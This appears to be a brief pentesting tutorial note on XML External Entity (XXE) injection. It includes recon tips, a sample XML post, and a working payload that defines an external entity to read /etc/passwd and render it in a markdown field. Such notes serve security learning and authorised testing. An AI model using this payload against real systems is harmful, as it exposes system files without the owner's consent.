XXE

XML External Entity

XXE vulnerabilities arise when an XML document contains a reference to an external entity, which the parser resolves.

PayloadsAllTheThings/XXE Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

PayloadAllThings

Recon

• If you can create or submit a XML file, try to find the endpoint where is being submitted and check if is being parsed (for example a filling form will have the content of the file already filled on the form):

Test file

<post>
        <title>Tokyo's Post</title>
        <description>A post from Tokyo</description>
        <markdown>
## post
This is a test.
        </markdown>
</post>

• Create a malicious XML ENTITY and added at the top of the XML to read /etc/passwd, make sure you add the parser (&file):

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd"> ]>
<post>
        <title>Tokyo's Post</title>
        <description>Read File</description>
        <markdown>&file;</markdown>
</post>